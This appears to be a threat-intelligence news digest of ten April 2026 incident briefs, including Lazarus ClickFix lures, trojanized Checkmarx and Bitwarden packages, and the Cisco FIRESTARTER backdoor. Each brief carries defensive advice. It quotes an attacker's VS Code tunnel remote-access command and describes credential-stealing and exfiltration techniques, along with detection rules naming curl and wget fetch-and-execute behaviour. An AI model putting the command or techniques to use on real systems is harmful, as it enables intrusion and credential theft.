Last updated: July 5, 2026 at 9:01 AM UTC
All 557 Vulnerability 199 Breach 106 Threat 245 Defense 7

Lazarus 'Mach-O Man' macOS malware kit hitting fintech and crypto execs through fake Telegram meeting invites and ClickFix terminal commands

ANY.RUN and Dark Reading published research on Mach-O Man, a new macOS malware kit Lazarus is deploying against fintech and crypto executives. The chain begins on Telegram with what looks like a legitimate meeting invite from a known contact, leading to a fake Zoom/Teams/Meet page that displays a fake 'connection issue' and instructs the executive to copy-paste a command into Mac Terminal. That ClickFix command grabs credentials, browser sessions, and Keychain data and exfiltrates over Telegram bot APIs. Lazarus has used the same template across the Drift and KelpDAO compromises, totaling more than $500M stolen in two weeks.

Check
Brief executive, finance, and treasury staff who use Telegram for business communication this week. The lure is a meeting invite from someone they trust, not a cold approach.
Affected
macOS users in executive, finance, business development, and partner-relations roles - particularly those who use Telegram for business. The technique works because the user runs the command themselves, bypassing most preventive controls including macOS endpoint protection. Mach-O Man is not Lazarus-only; other criminal groups have already adopted the kit.
Fix
Train executives never to copy-paste a 'fix' command into Terminal at a meeting page's request, regardless of how legitimate the invite looks. Log and alert on Terminal launches that fetch and execute remote content via curl, wget, osascript, or bash. Hunt for processes in tight infinite loops with Keychain access. Consider Lockdown Mode for high-risk roles.

Kaspersky finds 26 'FakeWallet' apps on Apple's App Store impersonating MetaMask, Coinbase, Trust Wallet, and Ledger to steal crypto seed phrases

Kaspersky identified 26 malicious iOS apps live on the Apple App Store impersonating major cryptocurrency wallets including MetaMask, Coinbase, Trust Wallet, Ledger, TokenPocket, imToken, Bitpie, and OneKey. The campaign, named FakeWallet and linked to the SparkKitty operation, has been running since fall 2025. The apps used typosquatted names, cloned icons, and stub functionality (games, calculators, task planners) to pass App Store review. Some embed compromised viewDidLoad routines that scan the screen for mnemonic words as the user types and exfiltrate seed phrases via RSA-encrypted payloads. Apple removed 25 of the 26 after disclosure; the developer behind the 26th was terminated.

Check
Audit wallet apps installed on any iOS device that holds crypto credentials - your own and team members' devices used for treasury, payroll, vendor payments, or personal investing.
Affected
iOS users who downloaded any of the 26 FakeWallet apps between fall 2025 and the April 2026 takedowns, particularly those with Apple account region set to China. Anyone who entered a seed phrase must assume their wallet is compromised. Cold wallet users are not exempt - some variants embedded into companion apps.
Fix
Review every App Store download under any region, particularly wallet or crypto apps. Cross-check developer names against official wallet websites (MetaMask is ConsenSys, Trust Wallet is DApps Platform Inc., Ledger is Ledger SAS). Any wallet app that asks for your seed phrase is a thief. If exposed, transfer assets to a fresh wallet on known-clean hardware and treat the old seed as burned.

Tropic Trooper ditches Cobalt Strike for AdaptixC2 - new campaign against Taiwan, South Korea, and Japan uses trojanized SumatraPDF, GitHub C2, and VS Code tunnels for remote access

Zscaler ThreatLabz attributed a March 12 campaign to Tropic Trooper (APT23, Earth Centaur, KeyBoy, Pirate Panda), the China-linked group active since 2011. The new wave targets Chinese-speaking users in Taiwan plus targets in South Korea and Japan with AUKUS-themed lures. Two notable changes: a custom AdaptixC2 Beacon listener instead of Cobalt Strike, and GitHub Issues as the C2 channel. The dropper is a trojanized SumatraPDF reader that runs a TOSHIS-variant shellcode loader and drops AdaptixC2 in memory. For high-value victims, operators push VS Code and configure a tunnel ('code tunnel user login --provider github') for full remote access.

Check
Hunt your fleet for unexpected VS Code tunnel sessions from non-developer endpoints and block 'code tunnel user login' outside approved developer accounts.
Affected
Organizations with operations or staff in Taiwan, South Korea, or Japan working on Indo-Pacific security, defense policy, or AUKUS-adjacent topics. Any environment where VS Code is broadly installed (including non-developer roles) is exposed to the tunnel pivot. The trojanized SumatraPDF binary keeps the original signature structure intact in some samples.
Fix
Block .exe masquerading as documents at email and web gateways. Alert on encrypted POSTs to GitHub Issues from non-developer endpoints. Detect the VS Code tunnel pivot by alerting on 'code tunnel user login' from any account without a documented dev workflow. Audit corporate GitHub OAuth grants. Consider removing VS Code from non-developer endpoints entirely.

NASA OIG details how Chinese national Song Wu spear-phished aerospace software from NASA, Air Force, Navy, FAA, universities, and private firms over four years by impersonating colleagues

NASA's Office of Inspector General published a retrospective on April 24 detailing how Chinese national Song Wu, an engineer at a state-owned Chinese aerospace and defense conglomerate, ran a multi-year spear-phishing campaign from January 2017 to December 2021. Song impersonated real US engineers known to his targets and asked over email for copies of specific aerospace modeling software and source code that could design or modify weapons platforms. Targets included staff at NASA, US Air Force, Navy, Army, FAA, major universities, and private aerospace firms. Several victims, believing they were helping a friend, sent the requested software - inadvertently violating US export control laws.

Check
Use the NASA OIG release as a case study in awareness training for engineering and research staff who handle export-controlled or proprietary technical artifacts.
Affected
Aerospace, defense, advanced manufacturing, and dual-use research organizations are the named target set, but the technique generalizes. Any organization whose staff regularly share technical artifacts with external collaborators based on personal trust is at risk. Universities and contractors holding ITAR or EAR-controlled materials face both security risk and legal liability for export-control violations.
Fix
Brief engineering staff on the Song Wu pattern: the lure is an email from someone you actually know asking for software you actually have. Require a non-email verification step (voice or video call) for any inbound request for source code or controlled software. Tighten outbound DLP around CAD, source code, and simulation file transfers, with managerial approval above a defined threshold.

Iran operating like a criminal actor, ex-NSA director says - opportunistic credentials and amplification, not novel exploits

At the Asness Summit in Nashville on April 24, former NSA director Tim Haugh and Mandiant founder Kevin Mandia argued Iran's current cyber posture more closely resembles a criminal actor than a sophisticated APT - reliant on dark-web-purchased credentials, basic security gaps, and information operations to amplify modest intrusions. They cited the March 11 Stryker attack as the template: no malware, no zero-day, just legitimate credentials used to abuse MDM and delete data the attacker had permission to delete. Mandia's CISO advice: assume valid credentials for your staff are already on sale and build detection around their misuse.

Check
Run a credential-monitoring service against your domain this week and put alerts in place for impossible-travel and unusual-MDM-action patterns on admin accounts.
Affected
Any organization with US or Israeli ties, plus their suppliers and contractors, fits the Iranian targeting profile. Acute risk: organizations where MDM, RMM, or any endpoint-management platform can issue destructive commands without out-of-band approval; environments without credential-monitoring services watching dark-web markets for staff logins.
Fix
Subscribe to a credential-monitoring service (HaveIBeenPwned Enterprise, SpyCloud, Flare) and alert on staff credentials surfacing in stealer logs. Require step-up auth on any MDM or RMM destructive action (wipe, uninstall, mass-deploy). Brief comms staff that any Iran-claimed breach should be verified before public response - operators routinely overclaim to amplify modest access.

CISA and UK NCSC warn 'FIRESTARTER' backdoor survives Cisco ASA/Firepower patches - US agency compromised, hardware replacement recommended

CISA and the UK's National Cyber Security Centre jointly published a malware analysis report for FIRESTARTER, a persistent backdoor that China-linked group UAT-4356 (the same crew behind 2024's ArcaneDoor campaign) planted on Cisco ASA and Firepower firewall devices by chaining CVE-2025-20333 (VPN web server RCE) and CVE-2025-20362 (unauthorized access). The implant hooks into Cisco's Service Platform mount list, a boot-time configuration that controls which programs run when the device starts, so it survives reboots, firmware upgrades, and the September 2025 patches for those two CVEs. CISA found FIRESTARTER on an already-patched US federal civilian agency's Cisco Firepower device through continuous network monitoring - attackers silently returned in March 2026 to deploy a second-stage implant called Line Viper without needing to re-exploit the original vulnerabilities. Updated Emergency Directive ED 25-03 now orders federal agencies to audit every Cisco ASA and Firepower device they run and submit device memory snapshots for CISA analysis. The stark guidance for everyone else: if you confirm a compromise, replace the hardware. Reimaging is not enough because the bootloader itself may be implanted.

Check
Inventory every Cisco ASA and Firepower Threat Defense device in your environment - including branch offices, remote sites, and lab gear - and check patch status against CVE-2025-20333 and CVE-2025-20362 as the absolute minimum baseline.
Affected
Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) devices running ASA/FTD software, particularly any units that were internet-exposed and unpatched between the September 2025 patch release and the date you actually applied it. Devices patched in that window may still carry the FIRESTARTER implant because the backdoor survives patching.
Fix
Patch any ASA/FTD device still vulnerable to CVE-2025-20333 or CVE-2025-20362 immediately. Then perform a core dump on every device following CISA's supplemental direction and look for FIRESTARTER indicators described in MAR AR26-113A and the joint advisory AA26-113A. Any device showing indicators of compromise must be replaced with new hardware - do not trust reimaging or factory reset, because the persistence mechanism modifies the Cisco Service Platform mount list and the bootloader may be affected. Rotate all VPN credentials and admin passwords on affected devices. Hunt for Line Viper and review firewall logs for unexpected outbound connections from management interfaces for the period after initial patching.

'Shai-Hulud: The Third Coming' worm pivots from Checkmarx KICS compromise into Bitwarden CLI, stealing SSH keys, cloud secrets, and MCP configs for AI coding tools

TeamPCP's self-propagating supply-chain worm is back in its third iteration, branded 'Shai-Hulud: The Third Coming' in hard-coded strings across the malware. On April 22, Socket reported Checkmarx's official KICS Docker images and a KICS VS Code / Open VSX extension had been trojanized. Bitwarden's own clients repo runs a Checkmarx scan on every pull request via a pull_request_target workflow that holds id-token: write and fetches credentials from Azure Key Vault, so when the poisoned scanner executed it harvested GitHub OIDC and Azure tokens. At 17:57 ET the same day, attackers used those tokens to push a modified publish-cli.yml to the Bitwarden repo and publish a malicious @bitwarden/cli version 2026.4.0 to npm. The package remained live for 93 minutes until Bitwarden pulled it at 19:30 ET. The payload: a 10MB obfuscated credential harvester that grabs SSH keys, cloud provider credentials, npm publish tokens, GitHub tokens, and - new in this variant - MCP (Model Context Protocol) configuration files used by Claude Code, Cursor, and similar AI coding tools. It then self-propagates by republishing into every npm package the victim can modify and uploads encrypted stolen secrets to public GitHub repositories under Dune-themed names. The worm has a Russian-locale kill switch (exits if LC_ALL/LANG starts with 'ru').

Check
Immediately check every CI/CD runner, developer laptop, and container that pulled Checkmarx KICS Docker images, the KICS GitHub Action, or @bitwarden/cli between March 23 and April 23, and rotate every credential that was ever present on those machines.
Affected
Confirmed malicious artifacts per Socket: @bitwarden/cli 2026.4.0 on npm (live 21:57 to 23:30 UTC on April 22, a 93 minute window); compromised Checkmarx KICS Docker images and GitHub Actions (first compromised March 23, re-compromised April 22); two Checkmarx-published Visual Studio Code and Open VSX extensions. Any npm package subsequently republished by a victim whose npm token this worm captured is also potentially malicious.
Fix
Remove the listed versions from all developer environments, CI runners, and private mirrors. Rotate every credential the worm would have seen: GitHub PATs and OIDC tokens, npm publish tokens, cloud provider keys (AWS/GCP/Azure), SSH keys, Azure Key Vault secrets, container registry creds, and MCP config files for AI coding tools - assume every credential stored in ~/.config, ~/.ssh, or exported to CI env is burned. Audit bitwarden/clients commit history for changes to publish-cli.yml and similar pipeline files around April 22. Search public GitHub for repositories named after Dune terms (beautifulcastle-* pattern) to find whether your stolen data has been published. Tighten pull_request_target triggers on security scanners - they should not have id-token: write permission.

Trigona ransomware operators ship a custom command-line data-theft tool to speed exfil and reduce dwell time

BleepingComputer reported on April 23 that recent Trigona ransomware intrusions are using a purpose-built command-line exfiltration tool rather than off-the-shelf rclone or MEGAcmd. The custom utility is small, supports parallel uploads, filters by file extension and size before transferring, and logs progress in a format optimized for ransomware operator dashboards. Researchers say the tool reduces dwell time meaningfully - operators are now exfiltrating high-value files in hours rather than days. The shift fits a broader trend (Akira, Black Basta, Play) toward bespoke tooling and away from detectable third-party utilities, making static endpoint signatures less reliable.

Check
Tighten outbound DLP and egress rules around document and source-code repositories - detect bulk reads regardless of which utility is doing the reading.
Affected
Organizations in Trigona's typical victim profile (manufacturing, healthcare, education, mid-market enterprises) without modern data-exfiltration detection. Static endpoint signature lists for rclone, MEGAcmd, FileZilla won't catch this custom tool. Networks without egress-bandwidth alerting on file servers or document-management hosts are equally exposed.
Fix
Switch outbound detection from utility names to behavior: alert on processes opening many files in many directories within a short window, on outbound TLS sessions transferring more than ~500MB from non-server endpoints, and on uploads to consumer cloud storage (Mega, Dropbox personal accounts) from corporate hosts. Add canary files in document repositories and alert on any read.

New Linux variant of GoGra backdoor uses Microsoft Graph API for stealth C2 - blends in with legitimate Office 365 traffic

Security Affairs covered new research on April 23 documenting a Linux port of the GoGra backdoor, originally seen as Windows-only. The Linux variant retains GoGra's defining feature: it uses Microsoft Graph API as its command-and-control channel, fetching commands from Outlook drafts in an attacker-controlled Microsoft 365 tenant and writing results back to the same drafts. Because the C2 traffic is HTTPS to graph.microsoft.com - the same endpoint legitimate clients hit constantly - it is invisible to most network-layer detections. The Linux port targets enterprise Linux servers with Outbound 443 access to Microsoft cloud services, broadening reach onto build servers and jump hosts.

Check
Audit which Linux servers in your environment have outbound HTTPS access to graph.microsoft.com and restrict it to hosts with a documented Microsoft 365 use case.
Affected
Linux servers with outbound HTTPS access to graph.microsoft.com - in most enterprise networks that means almost all of them, since egress filters routinely allow the entire Microsoft 365 endpoint range by default. Build servers, jump hosts, developer workstations, and DMZ services with Linux are the highest-value targets because they often hold credentials and source code.
Fix
Restrict graph.microsoft.com egress to only hosts that genuinely need it (mail relays, M365 integrations). On all other Linux hosts, log and alert on outbound graph.microsoft.com connections. In your M365 tenant, enable audit logging for application registrations and OAuth grants and alert on tokens used from unfamiliar IPs. Rotate credentials for any Linux server that had unsanctioned graph.microsoft.com traffic.

China-linked spies named 'GopherWhisper' targeted Mongolian government using Slack, Discord, and Outlook drafts as their command channel

ESET disclosed GopherWhisper, a previously undocumented China-linked spy group active since at least November 2023 and targeting Mongolian government systems. The group's defining trick: instead of building its own command-and-control servers, it sends instructions through ordinary cloud services - private Slack channels, Discord servers, Outlook draft email folders, and the file.io file-sharing service. Because the malware traffic looks like normal Slack and Discord usage, network monitoring tools largely ignore it. ESET extracted thousands of operator messages from the attackers' own Slack and Discord workspaces, and even found a 'How to write RATs.txt' file in their Downloads folder.

Check
Audit which corporate endpoints have outbound access to slack.com, discord.com, graph.microsoft.com, and file.io without a clear business reason.
Affected
Organizations with operations in Mongolia or staff working on Indo-Pacific affairs. More broadly: any environment where outbound HTTPS to Slack, Discord, Microsoft Graph, or file.io is allowed by default - which is most corporate networks. Build servers, jump hosts, and developer machines are at acute risk because they need outbound HTTPS but have no business reason to talk to Slack or Discord.
Fix
Restrict outbound HTTPS to Slack, Discord, and file.io to only endpoints with a documented business reason. Alert on outbound traffic to those services from servers and developer machines that shouldn't be using them. In Microsoft 365, audit OAuth grants and alert on draft email creation in unfamiliar mailboxes. Block file.io entirely if you have no use case. ESET's GitHub repo lists the indicators.